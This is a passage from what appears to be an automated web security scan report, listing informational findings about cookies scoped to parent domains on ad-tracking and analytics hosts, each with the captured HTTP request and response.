Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=67:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=196
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:47 GMT
Content-Length: 910
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b';
...[SNIP]...

13.25. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h639958Za722607Zc305000825%2C305000825Zs263Zt1246&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h639958Za722607Zc305000825,305000825Zs263Zt1246;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1467
Date: Sun, 04 Sep 2011 01:05:03 GMT
Connection: close



13.26. http://clk.fetchback.com/serve/fb/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315099337_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Set-Cookie: cre=1_1315099337_34024:68292:2:121174:121256; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Set-Cookie: clk=1_1315099337; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 01:22:17 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://default.com
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif


13.27. http://cm.npc-mcclatchy.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=lifestyle&ctxtId=lifestyle&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&ctxtCat=lifestyle&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097138735&ctxtContent=%3Chead%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%0A%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fb.scorecardresearch.com%2Fbeacon.js%22%3E%3C%2Fscript%3E%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Sacbee'%20%0A%7D%3B%0A%0A%0A%2F*Gomez%20tag%20version%3A%207.0*%2Fvar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:20:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

13.28. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /partner/js/ypn.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/js/ypn.js HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:00 GMT
Set-Cookie: BX=228g5ih765ieg&b=3&s=bh; expires=Tue, 04-Sep-2013 20:00:00 GMT; path=/; domain=.overture.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private, max-age=86400, must-revalidate
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 8564

// -- defaults --
ctxt_ad_interface_default = 'http://ypn-js.ysm.yahoo.com/d/search/p/ypn/jsads/';
ctxt_ad_width_default = 468;
ctxt_ad_height_default = 60;
ctxt_ad_partner_default =
...[SNIP]...

13.29. http://companion.adap.tv/companion/post

Summary

Severity:   Information
Confidence:   Certain
Host:   http://companion.adap.tv
Path:   /companion/post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companion/post HTTP/1.1
Host: companion.adap.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: close
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6220387657706691463__TIME__2011-09-03+18%3A22%3A21";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:22:21 GMT
Content-Type: text/html; charset=iso-8859-1
p3p: CP="DEM"
Cache-Control: no-cache
Content-Length: 1



13.30. http://control.adap.tv/control

Summary

Severity:   Information
Confidence:   Certain
Host:   http://control.adap.tv
Path:   /control

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+18%3A07%3A39";Path=/;Domain=.adap.tv;Expires=Tue, 03-Sep-13 01:07:39 GMT
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 32443

<?xml version="1.0" encoding="UTF-8"?>
<OneScript>
<Breadcrumbs>
<Query><![CDATA[context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2Cplayer
...[SNIP]...

13.31. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/rubicon-cms2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:44:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:44:15 GMT

GIF89a.............!.......,...........D..;

13.32. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.35.105
Connection: close
Date: Sun, 04 Sep 2011 01:22:23 GMT
Content-Length: 0


13.33. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:27 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=gkFJwX2XgYEBqqOKgqr6OA; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Sun, 04 Sep 2011 01:22:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...

13.34. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchrubicon=1; matchbluekai=1; matchaccuen=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:06:45 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 01:06:45 GMT
Cache-Control: private
Content-Length: 0
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
X-Version: DataXu Pixel Tracker v3
Via: 1.1 bfi061001 (MII-APC/2.1)
Content-Type: text/plain


13.35. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Location: &bimpd=
Date: Sun, 04 Sep 2011 01:22:43 GMT
Content-Length: 0
Connection: close


13.36. http://ib.adnxs.com/getuidnb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Location: y
Date: Sun, 04 Sep 2011 01:22:43 GMT
Content-Length: 0
Connection: close


13.37. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; uid=1_1315096959_1314893682667:5756480826433243; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 293

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url=' width='728' height
...[SNIP]...

13.38. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315096959_34024:68283:1:0:0_34024:68292:2:118796:118878_34023:68293:1:119509:119509; kwd=1_1315096959; scg=1_1315096959; ppd=1_1315096959; act=1_1315096959; uid=1_1315097051_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: uid=1_1315097051_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: kwd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: scg=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: ppd=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Set-Cookie: act=1_1315097051; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:44:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:44:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5489

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

13.39. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=J06575 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="...[SNIP]..."

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
Last-Modified: Sun, 04 Sep 2011 00:42:17 GMT
Cache-Control: max-age=3600, private
Expires: Sun, 04 Sep 2011 01:42:17 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:16 GMT
Content-Length: 6201

//AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC)
var rsi_now= new Date();
var rsi_csid= 'J06575';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

13.40. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=4006 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
